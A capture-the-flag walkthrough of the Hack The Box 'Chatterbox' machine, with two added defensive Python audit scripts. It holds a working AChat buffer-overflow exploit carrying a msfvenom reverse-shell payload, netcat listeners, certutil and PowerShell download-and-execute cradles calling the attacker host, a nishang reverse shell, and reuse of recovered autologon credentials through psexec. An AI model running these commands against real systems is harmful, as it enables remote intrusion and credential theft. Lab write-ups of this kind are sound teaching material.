Chatterbox
Port scan
u505@naos:~/HTB/Machines/Chatterbox$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.74
Starting masscan 1.0.5 at 2021-01-14 17:03:29 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 9255/tcp on 10.10.10.74
Discovered open port 9256/tcp on 10.10.10.74
u505@naos:~/HTB/Machines/Chatterbox$ nmap -sC -sV chatterbox
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:03 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.40 seconds
u505@naos:~/HTB/Machines/Chatterbox$ nmap -Pn -sC -sV chatterbox
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:03 EST
Nmap scan report for chatterbox (10.10.10.74)
Host is up.
All 1000 scanned ports on chatterbox (10.10.10.74) are filtered

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.74 seconds
u505@naos:~/HTB/Machines/Chatterbox$ nmap -Pn -p 9255,9256 -sC -sV chatterbox
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-14 12:07 EST
Nmap scan report for chatterbox (10.10.10.74)
Host is up (0.043s latency).

PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds
Achat buffer overflow
u505@naos:~/HTB/Machines/Chatterbox$ searchsploit achat
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (M | windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Sc | php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | php/webapps/24647.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
u505@naos:~/HTB/Machines/Chatterbox$ searchsploit -m 36025
  Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
      URL: https://www.exploit-db.com/exploits/36025
     Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
File Type: Python script, ASCII text executable, with very long lines, with CRLF line terminators
Copied to: /home/u505/HTB/Machines/Chatterbox/36025.py
Installing and running Achat v0.150 beta7 on a Windows 10 box shows that it listens on TCP 9255, TCP 9256 and UDP 9256.
Test the PoC on a Windows 10 box
C:\Users\u505>tasklist /v | findStr AChat
chrome.exe    2916 RDP-Tcp#1    3    141,960 K Running    WINDOWS10\u505    0:00:14 AChat download | SourceForge.net - Google Chrome
AChat.exe     2784 RDP-Tcp#1    3     23,496 K Running    WINDOWS10\u505    0:00:01 AChat v0.150 beta7

C:\Users\u505>netstat -ano | findStr 2784
  TCP    192.168.76.21:9255     0.0.0.0:0              LISTENING       2784
  TCP    192.168.76.21:9256     0.0.0.0:0              LISTENING       2784
  UDP    192.168.76.21:9256     *:*                                    2784
First try of the buffer overflow PoC.
u505@naos:~/HTB/Machines/Chatterbox$ cp 36025.py testw10_calc.py
u505@naos:~/HTB/Machines/Chatterbox$ diff testw10_calc.py 36025.py
57c57
< server_address = ('192.168.1.21', 9256)
---
> server_address = ('192.168.91.130', 9256)
78c78
< sock.close()
---
> sock.close()
\ No newline at end of file
Run the PoC, having updated only the target IP.
u505@naos:~/HTB/Machines/Chatterbox$ python testw10_calc.py
---->{P00F}!
Once the payload was sent, the chat window displayed a long run of Z characters, crashed and opened a calculator.
Test reverse shell on Windows 10
Modify the msfvenom payload to spawn a reverse shell instead of calc.exe.
u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
...
The modified Python script, compared with the original exploit.
u505@naos:~/HTB/Machines/Chatterbox$ diff testw10_rev.py 36025.py
54,122d53
< #u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.1.30 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
< #Found 1 compatible encoders
< #Attempting to encode payload with 1 iterations of x86/unicode_mixed
< #x86/unicode_mixed succeeded with size 774 (iteration=0)
< #x86/unicode_mixed chosen with final size 774
< #Payload size: 774 bytes
< #Final size of python file: 3767 bytes
< buf = b""
< buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
...
< buf += b"\x53\x69\x6f\x39\x45\x41\x41"
<
126c57
< server_address = ('192.168.1.21', 9256)
---
> server_address = ('192.168.91.130', 9256)
147c78
< sock.close()
---
> sock.close()
\ No newline at end of file
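Review bot: the 147c78 hunk is whitespace-only (the copy gained a trailing newline after `sock.close()`), so nothing functional changes there. In 54,122d53 the full msfvenom command is kept as a comment above `buf`, which is the right way to document how the payload was generated; the other per-target value, `server_address` in 126c57, sits far from that comment, so a short comment next to it stating the LHOST/LPORT the payload was built for would make the two values that must agree easier to audit.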
The payload is 774 bytes, below the 1152-byte maximum the exploit allows for it.
u505@naos:~/HTB/Machines/Chatterbox$ tail -n 25 testw10_rev.py
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.1.21', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
Start the listener.
u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Run the exploit.
u505@naos:~/HTB/Machines/Chatterbox$ python testw10_rev.py
---->{P00F}!
The reverse shell is opened.
u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.1.21.
Ncat: Connection from 192.168.1.21:58472.
Microsoft Windows [Version 10.0.19042.685]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
windows10\u505
Again, the exploit crashes the chat program. That is expected, but it needs to be taken into consideration.
Exploit the target
I modified the exploit with the target address and the msfvenom payload with the correct values.
u505@naos:~/HTB/Machines/Chatterbox$ grep 10.10 buf_achat.py
#u505@naos:~/HTB/Machines/Chatterbox$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
server_address = ('10.10.10.74', 9256)
Raised a listener.
u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
And run the exploit.
u505@naos:~/HTB/Machines/Chatterbox$ python buf_achat.py
---->{P00F}!
And the reverse shell opens.
u505@naos:~/HTB/Machines/Chatterbox$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49191.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred
User flag
C:\Windows\system32>cd c:\Users\alfred\desktop
cd c:\Users\alfred\desktop

c:\Users\Alfred\Desktop>type user.txt
type user.txt
<USER_FLAG>
Privilege escalation
It is a Windows 7 machine with all hotfixes installed.
c:\Users\Alfred\Desktop>systeminfo
systeminfo

Host Name:                 CHATTERBOX
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00371-222-9819843-86663
Original Install Date:     12/10/2017, 9:18:19 AM
System Boot Time:          1/14/2021, 12:00:46 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               X86-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     2,047 MB
Available Physical Memory: 1,541 MB
Virtual Memory: Max Size:  4,095 MB
Virtual Memory: Available: 3,436 MB
Virtual Memory: In Use:    659 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\CHATTERBOX
Hotfix(s):                 183 Hotfix(s) Installed.
                           [01]: KB2849697
                           [02]: KB2849696
                           ...
                           [183]: KB4054518
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.74
winPEAS
Start a web server that serves the winPEAS executable.
u505@naos:~/HTB/Machines/Chatterbox$ mkdir web
u505@naos:~/HTB/Machines/Chatterbox$ cd web
u505@naos:~/HTB/Machines/Chatterbox/web$ cp /opt/utils/privilege-escalation-awesome-scripts-suite/winPEAS/./winPEASexe/winPEAS/bin/x86/Release/winPEAS.exe ./
u505@naos:~/HTB/Machines/Chatterbox/web$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...
Upload winPEAS to the target.
c:\Users\Alfred\Desktop>certutil -urlcache -split -f "http://10.10.14.7/winPEAS.exe" winPEAS.exe
certutil -urlcache -split -f "http://10.10.14.7/winPEAS.exe" winPEAS.exe
****  Online  ****
  000000  ...
  073400
CertUtil: -URLCache command completed successfully.
Run the enumeration.
c:\Users\Alfred\Desktop>winPEAS.exe
winPEAS.exe
ANSI color bit for Windows is not set. If you are execcuting this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Creating Dynamic lists, this could take a while, please wait...
- Checking if domain...
...
[+] Looking for AutoLogon credentials
Some AutoLogon credentials were found!!
DefaultUserName : Alfred
DefaultPassword : Welcome1!
...
winPEAS found Alfred's credentials. I confirm it by querying the Winlogon key in the registry.
c:\Users\Alfred\Desktop>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    ShutdownWithoutLogon    REG_SZ    0
    WinStationsDisabled    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    scremoveoption    REG_SZ    0
    ShutdownFlags    REG_DWORD    0x80000033
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
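As an added defender-side check (not part of this writeup), the following Python parses a `reg query` dump of the Winlogon key, flags the AutoAdminLogon plus DefaultPassword combination that exposed Alfred's password to every local user, and lists the commands an administrator runs to remove it. The sample dump is constructed from the output above; the remediation assumes autologon is not needed on the host.

```python
import re

# Constructed sample: the `reg query ...\Winlogon` output shown in the writeup,
# trimmed to the values that matter for this check.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    LegalNoticeCaption    REG_SZ
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ    Alfred
    AutoAdminLogon    REG_SZ    1
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
"""

WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
# Value lines are indented: <name> <REG_type> [<data>]; subkey lines are not.
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)(?:\s+(.*))?$")


def parse_reg_query(text):
    """Return {value_name: data} for the value lines of a `reg query` dump.
    Subkey lines and blank lines are skipped; empty data becomes ''."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            name, _reg_type, data = m.groups()
            values[name] = (data or "").strip()
    return values


def audit_autologon(values):
    """Flag a Winlogon configuration that keeps a logon password in clear text.
    HKLM\...\Winlogon is readable by any local account, so a DefaultPassword
    there is exposed to every user on the box, exactly as winPEAS reported."""
    autologon = values.get("AutoAdminLogon", "0").strip() == "1"
    password = values.get("DefaultPassword", "")
    return {
        "autologon_enabled": autologon,
        "user": values.get("DefaultUserName", ""),
        "cleartext_password": bool(password),
        "finding": autologon and bool(password),
    }


def remediation_commands():
    """Administrator commands that delete the stored password and turn
    AutoAdminLogon off (assumes autologon is not required on this host)."""
    return [
        'reg delete "%s" /v DefaultPassword /f' % WINLOGON,
        'reg add "%s" /v AutoAdminLogon /t REG_SZ /d 0 /f' % WINLOGON,
    ]


if __name__ == "__main__":
    report = audit_autologon(parse_reg_query(SAMPLE_REG_QUERY))
    print(report)
    if report["finding"]:
        print("\n".join(remediation_commands()))
```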
Shell as administrator
We need to reach port 445 to perform a psexec, so we create a tunnel from our box to the target.
First step: download chisel.
u505@naos:~/HTB/Machines/Chatterbox/web$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_windows_386.gz
u505@naos:~/HTB/Machines/Chatterbox/web$ gunzip chisel_1.7.4_windows_386.gz
Upload chisel to the target.
c:\Users\Alfred\Desktop>certutil -urlcache -split -f "http://10.10.14.7/chisel_1.7.4_windows_386" chisel.exe
certutil -urlcache -split -f "http://10.10.14.7/chisel_1.7.4_windows_386" chisel.exe
****  Online  ****
  000000  ...
  724e00
CertUtil: -URLCache command completed successfully.
Run the chisel server on our box. Because the reverse tunnel binds port 445 locally, which is below 1024, the server must run as root.
u505@naos:~/HTB/Machines/Chatterbox$ wget -q https://github.com/jpillora/chisel/releases/download/v1.7.4/chisel_1.7.4_linux_amd64.gz
u505@naos:~/HTB/Machines/Chatterbox$ gunzip chisel_1.7.4_linux_amd64.gz
u505@naos:~/HTB/Machines/Chatterbox$ chmod +x chisel_1.7.4_linux_amd64
u505@naos:~/HTB/Machines/Chatterbox$ sudo ./chisel_1.7.4_linux_amd64 server --reverse --port 4445
[sudo] password for u505:
2021/01/14 14:33:55 server: Reverse tunnelling enabled
2021/01/14 14:33:55 server: Fingerprint KtsgB5aG+gCbCLsd2GVsizSCQg4gNCYDT0mfdac7R74=
2021/01/14 14:33:55 server: Listening on http://0.0.0.0:4445
Run the chisel client from the target. We use start /b to run it in the background and avoid losing access to the console.
c:\Users\Alfred\Desktop>start /b chisel.exe client 10.10.14.7:4445 R:445:127.0.0.1:445
2021/01/15 01:38:05 client: Connecting to ws://10.10.14.7:4445
2021/01/15 01:38:15 client: Connected (Latency 40.0023ms)
We confirm through the tunnel that the alfred credentials are valid over SMB.
u505@naos:~/HTB/Machines/Chatterbox$ crackmapexec smb 127.0.0.1/32 -u alfred -p 'Welcome1!'
SMB 127.0.0.1 445 CHATTERBOX [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB 127.0.0.1 445 CHATTERBOX [+] Chatterbox\alfred:Welcome1!
And the password of the user administrator is the same.
u505@naos:~/HTB/Machines/Chatterbox$ crackmapexec smb 127.0.0.1/32 -u administrator -p 'Welcome1!'
SMB 127.0.0.1 445 CHATTERBOX [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB 127.0.0.1 445 CHATTERBOX [+] Chatterbox\administrator:Welcome1! (Pwn3d!)
Use psexec to access the machine.
u505@naos:~/HTB/Machines/Chatterbox$ python3 /opt/utils/impacket/examples/psexec.py administrator@127.0.0.1
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 127.0.0.1.....
[*] Found writable share ADMIN$
[*] Uploading file DCTXVrZo.exe
[*] Opening SVCManager on 127.0.0.1.....
[*] Creating service CMKA on 127.0.0.1.....
[*] Starting service CMKA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
b'Access is denied.\r\n'

C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 5
[*] Opening SVCManager on 127.0.0.1.....
[*] Stopping service rbpD.....
[*] Removing service rbpD.....
[*] Removing file tDvADwgE.exe.....
This was unexpected: the SYSTEM user does not have rights over the file. We need to log in as administrator directly, so we copy the nishang reverse PowerShell script.
u505@naos:~/HTB/Machines/Chatterbox/web$ cp /usr/share/windows-resources/nishang/Shells/Invoke-PowerShellTcp.ps1 ./
u505@naos:~/HTB/Machines/Chatterbox/web$ mv Invoke-PowerShellTcp.ps1 RevAdmin4446.ps1
At the end of the script we append the call that starts the reverse shell.
u505@naos:~/HTB/Machines/Chatterbox/web$ vi RevAdmin4446.ps1
u505@naos:~/HTB/Machines/Chatterbox/web$ tail -n 5 RevAdmin4446.ps1
        Write-Error $_
    }
}

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.7 -Port 4446
We create a second script that calls the previous one (RevAdmin4446.ps1), but with the administrator credentials.
u505@naos:~/HTB/Machines/Chatterbox/web$ vi cred.ps1
u505@naos:~/HTB/Machines/Chatterbox/web$ cat cred.ps1
$pass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('Administrator',$pass)
start-Process -FilePath "powershell" -ArgumentList "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/RevAdmin4446.ps1')" -Credential $cred
Raise a listener on port 4446.
u505@naos:~/HTB/Machines/Chatterbox/web$ rlwrap nc -lnvp 4446
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Call the cred.ps1 script from the Alfred shell.
c:\Users\Alfred\Desktop>start /b powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/cred.ps1')"
start /b powershell -ExecutionPolicy Bypass -c "IEX(New-Object Net.webclient).downloadString('http://10.10.14.7/cred.ps1')"
The reverse shell is opened as administrator.
u505@naos:~/HTB/Machines/Chatterbox/web$ rlwrap nc -lnvp 4446
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4446
Ncat: Listening on 0.0.0.0:4446
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49169.
Windows PowerShell running as user Administrator on CHATTERBOX
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Alfred\Desktop> whoami
whoami
chatterbox\administrator
PS C:\Users\Alfred\Desktop>type c:\users\administrator\desktop\root.txt
<ROOT_FLAG>
Alternative: change the rights of root.txt
While trying to change the rights of the file root.txt as the user System, I noticed that user Alfred had rights on the Administrator's Desktop folder. This method allows us to read the file root.txt, but the box is not owned.
c:\Users\Alfred\Desktop>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
Alfred has access to the folder Desktop.
c:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
But not to the file root.txt.
Alfred can also list the rights of the file root.txt.

c:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files
Alfred appears to have full control of the folder and of inherited objects (but SYSTEM had that too, and it still failed).
c:\Users\Administrator\Desktop>icacls c:\Users\Administrator\Desktop
icacls c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                               CHATTERBOX\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
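An added example, not part of this writeup, that turns the two icacls listings above into an audit check: it parses icacls output (samples constructed from the listings shown) and reports any principal outside an expected set that holds full control, together with the inherited (I) and propagation (OI)(CI) flags that make such an ACE reach every new file in the folder. The expected-principal set is an assumption for this box; root.txt itself carries only an explicit Administrator ACE, so inheritance from the folder was broken for it.

```python
import re

# Constructed samples: the icacls listings from the writeup, laid out as icacls
# prints them (first ACE on the same line as the path, the rest indented).
SAMPLE_DESKTOP_ACL = r"""c:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                               CHATTERBOX\Alfred:(I)(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""
SAMPLE_ROOT_TXT_ACL = r"""root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Assumption for this host: the only principals that should hold full
# control over an administrator's profile folder.
EXPECTED_FULL_CONTROL = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
                         "CHATTERBOX\\Administrator"}

# <principal>:(FLAG)(FLAG)...   e.g. CHATTERBOX\Alfred:(I)(OI)(CI)(F)
ACE_RE = re.compile(r"^(.*?):((?:\([A-Z,]*\))+)$")


def parse_icacls(text, path):
    """Return [(principal, set_of_flags)] for one icacls listing of `path`.
    The queried path is passed in because icacls prints it only in front of
    the first ACE, separated from the principal by a space."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" summary
        principal, flag_str = m.groups()
        aces.append((principal, set(re.findall(r"\(([^)]*)\)", flag_str))))
    return aces


def overbroad_full_control(aces, expected=EXPECTED_FULL_CONTROL):
    """Principals with full control (F) that are not on the expected list.
    An inherited (I) ACE with (OI)(CI) is copied onto every new file and
    subfolder, so the exposure is not limited to the folder itself."""
    findings = []
    for principal, flags in aces:
        if "F" in flags and principal not in expected:
            findings.append({
                "principal": principal,
                "inherited": "I" in flags,
                "propagates": {"OI", "CI"} <= flags,
            })
    return findings


if __name__ == "__main__":
    desktop = parse_icacls(SAMPLE_DESKTOP_ACL, r"c:\Users\Administrator\Desktop")
    print(overbroad_full_control(desktop))
    print(parse_icacls(SAMPLE_ROOT_TXT_ACL, "root.txt"))
```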
Grant alfred full access to the file.
c:\Users\Administrator\Desktop>icacls root.txt /grant alfred:F
icacls root.txt /grant alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
Alfred now has full access.
c:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Alfred:(F)
         CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files
The flag is readable.
c:\Users\Administrator\Desktop>type root.txt
type root.txt
<ROOT_FLAG>
Alfred is the owner of the file, which is why the grant succeeded even though the file's explicit ACL did not list him: the owner of an object can always change its DACL.
c:\Users\Administrator\Desktop>dir /q root.txt
dir /q root.txt
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of c:\Users\Administrator\Desktop

01/15/2021  02:03 AM                34 CHATTERBOX\Alfred      root.txt
               1 File(s)             34 bytes
               0 Dir(s)  19,466,502,144 bytes free
References
- How do I change automatic logon via Script or Command Line?
- PowerShell says “execution of scripts is disabled on this system.”
- Run ScriptBlock with different credentials
